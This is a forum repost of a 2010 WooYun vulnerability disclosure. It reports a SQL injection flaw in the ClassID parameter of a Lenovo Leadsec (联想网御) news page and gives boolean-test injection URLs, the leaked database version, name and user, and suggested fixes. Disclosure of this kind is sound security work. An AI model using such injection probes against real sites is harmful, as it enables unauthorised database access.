Board logo

标题: 联想网御官网SQL注入漏洞 [打印本页]

作者: admin    时间: 2015-1-8 15:12     标题: 联想网御官网SQL注入漏洞

漏洞概要
缺陷编号:        WooYun-2010-00328
漏洞标题:        联想网御官网SQL注入漏洞
相关厂商:        联想网御
漏洞作者:        路人甲
提交时间:        2010-08-27 11:21
公开时间:        2010-08-27 16:22
漏洞类型:        SQL注射漏洞
危害等级:        中
自评Rank:        10
漏洞状态:        未联系到厂商或者厂商积极忽略
漏洞来源:        http://www.wooyun.org
Tags标签:       .net 字符类型注射 sqlserver

漏洞详情披露状态:
2010-08-27:        积极联系厂商并且等待厂商认领中,细节不对外公开
2010-08-27:        厂商已经主动忽略漏洞,细节向公众公开

简要描述:http://www.leadsec.com.cn/News/Detail.aspx页面中ClassID过滤不充分。

详细说明:页面存在sql注入。
漏洞证明:http://www.leadsec.com.cn/News/Detail.aspx?RootID=150&Aid=1858&ClassID=153'and 1=1--

http://www.leadsec.com.cn/News/Detail.aspx?RootID=150&Aid=1858&ClassID=153'and 1=2--



数据库版本:Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2



数据库名:LenovoDomain_DB

连接用户:Lenovo_f

权限:Public

修复方案:1、对输入参数ClassID过滤。

2、使用web应用防火墙。


版权声明:转载请注明来源 路人甲@乌云

漏洞回应
厂商回应:未能联系到厂商或者厂商积极拒绝
漏洞Rank:6 (WooYun评价)

原文:http://www.wooyun.org/bugs/wooyun-2010-0328




欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/) Powered by Discuz! 6.0.0